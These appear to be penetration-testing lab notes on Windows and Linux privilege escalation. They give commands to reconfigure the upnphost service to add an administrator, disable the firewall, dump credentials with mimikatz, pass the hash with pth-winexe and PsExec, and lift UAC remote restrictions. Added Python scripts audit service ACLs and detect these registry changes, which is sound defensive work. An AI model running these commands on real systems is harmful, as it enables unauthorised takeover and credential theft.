# keepnote

**File transfer:**

{% embed url="https://blog.ropnop.com/transferring-files-from-kali-to-windows/" %}

**WinPrivCheck:**

<https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat>

**Local Privilege Escalation Abusing a Misconfigured Service (upnphost):**

```
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula

accesschk.exe -ucqv upnphost
sc config upnphost depend= ""
sc config upnphost binpath= "net user testxlab Password1 /add"
sc config upnphost binpath= "net localgroup Administrators testxlab /add"

sc stop upnphost
sc start upnphost
```
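The `accesschk -uwcqv` line above is the audit step: it lists which principals can write a service's configuration. The following script is an added example (not part of the original notes) that parses output in that shape and reports every service whose configuration is writable by a low-privilege group, so an administrator can fix the ACL before it is abused. `SAMPLE_ACCESSCHK_OUTPUT` is constructed for the example; the right names and principal names are real Windows identifiers, but the exact layout of real accesschk output may differ slightly between versions.

```python
"""Audit service ACLs for configuration rights held by low-privilege groups.

Added example, not from the original notes: parses text in the shape of
`accesschk.exe -uwcqv "Authenticated Users" *` output and lists services
whose configuration (binPath, dependencies, start type) can be rewritten by
non-administrative principals, which is the misconfiguration the upnphost
commands above rely on. SAMPLE_ACCESSCHK_OUTPUT is constructed for this
example; real accesschk output has the same shape but may differ in detail.
"""
import re

# Rights that allow rewriting a service's configuration or its ACL.
CONFIG_WRITE_RIGHTS = {
    "SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE",
}

# Principals that should never hold any of the rights above on a service.
LOW_PRIV_PRINCIPALS = {
    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE",
    "Everyone", "BUILTIN\\Users",
}

# Constructed sample: one misconfigured service (upnphost) and one sane one.
SAMPLE_ACCESSCHK_OUTPUT = """\
upnphost
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\\Authenticated Users
        SERVICE_ALL_ACCESS
Spooler
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
  R  NT AUTHORITY\\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        READ_CONTROL
"""

# "  RW <principal>" introduces an ACE; deeper-indented lines list its rights.
ACE_LINE = re.compile(r"^ {2}(RW|R|W)\s+(.+?)\s*$")
RIGHT_LINE = re.compile(r"^ {4,}([A-Z_]+)\s*$")


def parse_accesschk(text):
    """Return {service: {principal: set(rights)}} from accesschk -uwcqv output."""
    services = {}
    service = principal = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):          # unindented line = service name
            service = line.strip()
            services[service] = {}
            principal = None
            continue
        m = ACE_LINE.match(line)
        if m and service is not None:
            principal = m.group(2)
            services[service].setdefault(principal, set())
            continue
        m = RIGHT_LINE.match(line)
        if m and principal is not None:
            services[service][principal].add(m.group(1))
    return services


def find_writable_services(text, principals=LOW_PRIV_PRINCIPALS):
    """Return [(service, principal, [rights])] where a low-priv principal can rewrite config."""
    findings = []
    for service, aces in parse_accesschk(text).items():
        for principal, rights in aces.items():
            offending = sorted(rights & CONFIG_WRITE_RIGHTS)
            if principal in principals and offending:
                findings.append((service, principal, offending))
    return findings


if __name__ == "__main__":
    for service, principal, rights in find_writable_services(SAMPLE_ACCESSCHK_OUTPUT):
        print(f"{service}: {principal} holds {', '.join(rights)}; remove these rights")
```

Run it against saved output (`accesschk.exe -uwcqv "Authenticated Users" * /accepteula > svc.txt` on the host, then feed the file to `find_writable_services`). Any service it reports should have the listed rights removed from that principal; the Spooler entry in the sample shows what a healthy ACL looks like, where Authenticated Users can only query the service.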

**File Transfer via FTP**

```
ftp> binary
ftp> put /root/Downloads/accesschk.exe accesschk.exe
```

`cadaver http://10.11.1.14/` (cadaver is a WebDAV client, not an FTP client)

**Python Interactive Shell**

Spawn a PTY from a limited shell:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
```

**Disable Windows firewall on newer versions:**\
`NetSh Advfirewall set allprofiles state off`

**Disable windows firewall on older windows:**\
`netsh firewall set opmode disable`

**References**

priv esc linux - hacking articles (abusing the PATH variable) <https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/> <https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/>

priv esc - cron jobs <https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/>

priv esc - windows - services - sc <https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/>

## PtH

`pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe`

#### via Sysinternals tools and mimikatz

* **PtH: get the user's NTLM hash (via RDP, MSF or other means)**

```
mimikatz# privilege::debug
mimikatz# sekurlsa::minidump FILE.DMP
mimikatz# sekurlsa::logonpasswords
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}
```

A new cmd window opens; from it you can run commands via PsExec:

`windows> PsExec.exe \\{IP} cmd`

Tip: general usage with a password:

`PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd`

If you get the error "Couldn't access otherComputer: Access is denied.", run the following command on the target system. It sets LocalAccountTokenFilterPolicy, which disables UAC remote restrictions so local administrator accounts receive a full token over the network; on a managed host, this value changing to 1 is worth alerting on.

`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`
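Both the `sc config ... binpath=` commands in the upnphost section and the `reg add ... LocalAccountTokenFilterPolicy` command above end up as registry value writes (ImagePath under the service's key, and the UAC policy value under Policies\System), so one registry-write detection covers both. The script below is an added example, not part of the original notes: it runs two rules over normalised "registry value set" records. The field names `host`, `object_name`, `value_name` and `new_value` are an assumption about how a log pipeline would normalise Security event 4657 or Sysmon event 13, and the records in `SAMPLE_EVENTS` are constructed for the example.

```python
"""Detect the two host changes in these notes from normalised registry events.

Added example, not from the original notes. Both `sc config ... binpath=` and
`reg add ... LocalAccountTokenFilterPolicy` end up as registry value writes
(ImagePath under the service key; the UAC policy value under Policies\\System),
so one "registry value set" record shape covers both. The record fields used
here (host, object_name, value_name, new_value) are an assumption about how a
log pipeline normalises Security event 4657 or Sysmon event 13; the records
in SAMPLE_EVENTS are constructed for this example.
"""
import json
import re

# A service ImagePath should be an executable path, not a shell command.
COMMAND_BINPATH = re.compile(
    r'^\s*"?(net1?|cmd|powershell|pwsh|rundll32|mshta|[wc]script)(\.exe)?\b',
    re.IGNORECASE,
)
SERVICE_IMAGEPATH = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.IGNORECASE)
UAC_POLICY_KEY = re.compile(r"\\policies\\system$", re.IGNORECASE)

SERVICES_KEY = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
POLICY_KEY = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"

# Constructed sample records (field names are this example's own schema).
SAMPLE_EVENTS = [
    {"host": "WS01", "object_name": SERVICES_KEY + "upnphost",
     "value_name": "ImagePath", "new_value": "net user testxlab Password1 /add"},
    {"host": "WS01", "object_name": SERVICES_KEY + "Spooler",
     "value_name": "ImagePath", "new_value": "C:\\Windows\\System32\\spoolsv.exe"},
    {"host": "WS01", "object_name": POLICY_KEY,
     "value_name": "LocalAccountTokenFilterPolicy", "new_value": "1"},
    {"host": "WS01", "object_name": POLICY_KEY,
     "value_name": "EnableLUA", "new_value": "1"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def detect(events):
    """Return [(host, rule, detail)] alerts for the registry-write records given."""
    alerts = []
    for ev in events:
        key = ev.get("object_name", "")
        name = ev.get("value_name", "")
        new = str(ev.get("new_value", ""))
        m = SERVICE_IMAGEPATH.search(key + "\\" + name)
        if m and COMMAND_BINPATH.match(new):
            alerts.append((ev["host"], "service-imagepath-is-command",
                           f"service {m.group(1)} ImagePath set to {new!r}"))
        elif (UAC_POLICY_KEY.search(key)
              and name.lower() == "localaccounttokenfilterpolicy" and new == "1"):
            alerts.append((ev["host"], "uac-remote-restrictions-disabled",
                           "LocalAccountTokenFilterPolicy=1: local admin accounts get a "
                           "full token over the network"))
    return alerts


def detect_jsonl(text):
    """Same detections over newline-delimited JSON records."""
    return detect(json.loads(line) for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    for host, rule, detail in detect_jsonl(SAMPLE_JSONL):
        print(f"[{host}] {rule}: {detail}")
```

The ImagePath rule keys on the value starting with a command interpreter or `net`, which is what a service abused as a one-shot command runner looks like, while a real service points at an executable path; the Spooler record in the sample stays silent for that reason. The UAC rule only fires on the value becoming exactly `1`, so routine policy refreshes that rewrite other values under the same key do not alert.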
